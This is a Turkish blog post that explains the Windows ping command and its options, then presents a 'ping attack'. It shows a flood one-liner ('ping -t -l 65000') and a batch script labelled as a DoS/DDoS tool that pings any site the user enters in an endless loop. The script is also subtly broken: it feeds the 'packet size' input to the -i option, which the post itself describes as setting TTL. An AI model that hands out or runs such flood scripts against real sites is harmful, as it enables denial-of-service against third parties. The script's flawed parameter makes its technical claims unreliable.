8 Ocak 2016

Ping Komutu ve Ping Atak

Ping Komutu ve Ping Atak

Ping programı bilgisayarlar arası ağ bağlantı testi için kullanılan bir uygulamadır. Bir makineye genelde 32 baytlık bir ICMP paketi gönderir ve aynı paketin geri gelmesini bekler. Bu basit program, birçok işe yarayabilir. Sunucu size ne kadar uzak ise, bu süre de o kadar artmaktadır. Örneğin Türkiye'deki sunuculara 40ms ile bağlanırsınız. Ama İrlanda'daki bir sunucuya bağlanmak istediğinizde mesafe arttığı için bu süre 90ms gibi seviyelere çıkar.

Örnek olarak Windows'da DOS(cmd) ile PowerShell veya Linux'da terminali açarak konsola ping ve test edeceğimiz IP veya DNS adresini yazarak ping işlemini uygulayabilirsiniz.

C:\> ping www.burakavci.com.tr
ghs.l.google.com [173.194.65.121] yoklanıyor32 bayt veri ile:
173.194.65.121 cevabı: bayt=32 süre=65ms TTL=43
173.194.65.121 cevabı: bayt=32 süre=64ms TTL=43
173.194.65.121 cevabı: bayt=32 süre=64ms TTL=43
173.194.65.121 cevabı: bayt=32 süre=67ms TTL=43

173.194.65.121 için Ping istatistiği:
Paket: Giden = 4, Gelen = 4, Kaybolan = 0 (%0 kayıp),
Mili saniye türünden yaklaşık tur süreleri:
En Az = 64ms, En Çok = 67ms, Ortalama = 65ms

Yukarıdaki örnekte siteme 4 adet 32 baytlık ICMP paketleri gönderdim. Sunucu bu paketleri saldırı olarak algılamaz.

Öte yandan, ICMP paketleri ve dolayısıyla ping, çoğu Firewall tarafından bloke edilir. Gönderdiğini paketlere cevap olarak İstek zaman aşımına uğradı. mesajını alırsınız.

Ping Komutu ve Ping Atak

Ping Komut Seçenekleri

-t: Karşı taraftan bağlantı kesilene kadar 32 baytlık ICMP paketi gönderir. İşlemi durdurmak ve ping komutundan çıkmak için CTRL+C tuşlarına basmanız yeterlidir.
Örnek: ping -t www.burakavci.com.tr

-n <Number>: Karşı tarafa göndereceğiniz 32 baytlık ICMP paket sayısı için kullanılır. Normal bir ping komutunda varsayılan değer dörttür. Aşağıdaki örnekte 50 adet paket gönderdik. İkinci örnekte ise "-w" parametresi ile birleştirdik.
Örnek: ping -n 50 www.burakavci.com.tr
Örnek: ping -n 5 -w 1000 www.burakavci.com.tr

–l <Boyut>: Ping paketinin boyutunu ayarlamamıza olanak sağlar. Varsayılan boyut 32 bayt olup en büyük boyut ise 65.527 bayt. Örnek olarak bu komutu "-t" komutu ile birleştirip (Birden fazla Ping atak yapacağız çünkü) 65.000 bayt boyutunda paketler gönderelim. Bu yaptığımı örnek Ping Atağa(Basit Dos Atak) örnektir. Tabi bu boyutta bir pakete cevap genelde İstek zaman aşımına uğradı mesajı olur.
Örnek: ping -t -l 65000 www.burakavci.com.tr

-w <Zamanaşımı>: Zaman aşımını (milisaniye cinsinden) ayarlamanıza olanak sağlar. Varsayılan değer 1.000’dir (1 saniyelik zaman aşımı). Örneğin, 5 saniye içinde yanıtlara izin vermek için aşağıdaki komutu kullanabilirsiniz.
Örnek: ping -w 5000 www.burakavci.com.tr

-a: Karşı tarafa iletilen paket başarılı olursa ping karşılık gelen ana makine adını görüntüler.

-f: Ping paketinde Do Not Fragment bitini ayarlar. Varsayılan olarak, ping paketi parçalamaya izin verir. Yalnızca IPv4’de kullanılabilir.

-i <TTL>: Yaşam süresidir. Gönderilen paketlerde IP üst bilgisindeki TTL alanı değerini belirtir. Varsayılan değer, ana makinenin varsayılan TTL değeridir. TTL için en yüksek değer 255’tir.

-v <TOS>: Hizmet Türü (TOS) alanı değerini belirtir sadece IPv4’te kullanılabilir. Alacağı değerler 0 (sıfır) ile 255 arasında bir ondalık değer olarak belirtilir. Bu parametre şuan için devre dışıdır.

-r <Number>: Atlama sayısı için kayıt yoludur ve yalnızca IPv4 için geçerlidir. Bu parametre 1 ile 9 arası değer alır.
Örnek: ping -r 1 www.burakavci.com.tr

-s <Number>: "İnternet Zaman Damgası" seçeneğinin, her atlama için "Yankı İsteği" iletisi ve karşılık gelen "Yankı Yanıtı" iletisinin geliş zamanını kaydetmek için kullanılacağını belirtir. Sayı en az 1, en fazla 4 olmalıdır. Bağlantı yerel adresleri için bu gerekir.


Basit Ping Atak (BAT Dosyası)
Çok basit bir Ping atak komutunu BAT dosyası ile birleştirerek DOS ve DDOS saldırı mantığını anlayabilirsiniz. Aşağıdaki komutları Ping.bat veya DDOS.bat olarak kaydedin.
@echo off
mode 65,30
title PING DOS-DDOS Atak
color 02
cls
echo.
echo -------------------
echo PING DOS-DDOS Atak
echo -------------------
echo.
set /p hedef=Hedef Site:
echo.
echo -------------------
ping %hedef%
echo -------------------
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=Hedef IP Adresi:
echo.
set /p n=Paket Boyutu:
echo.
:DDOS
color 0c
echo SALDIRI YAPILIYOR %m%
ping %m% -i %n% -t >nul
goto DDOS
Oluşturduğunuz bat dosyasını açın. Herhangi bir site adresi yazın. Standart ping komutundan sonra hedef IP kısmına sitenin IP adresini yazın. Paket boyutu kısmına herhangi bir sayı yazın 10000 veya 1000000 sonra paketler gönderilecektir.

Bu yaptığımız ping atak yani ICMP paketi gönderme işlemine basit DOS(Denial of Service Attack) atak deniyor. Bu işlemi eş zamanlı olarak aynı hedefe birden fazla kişi yaparsa atağın ismi DDOS oluyor.

Kaynaklar
tr.wikipedia.org/wiki/Ping (Ping Komutu)
en.wikipedia.org/wiki/Ping_(networking_utility) (Ping Komutu)
https://technet.microsoft.com/tr-tr/library/cc737478(v=ws.10).aspx (Ping Komutu)
FreeBSD Ping Komutları ve Anlamları
tr.wikipedia.org/wiki/Windows_PowerShell (Windows PowerShell)
en.wikipedia.org/wiki/Windows_PowerShell (Windows PowerShell)

Hiç yorum yok:

Yorum Gönder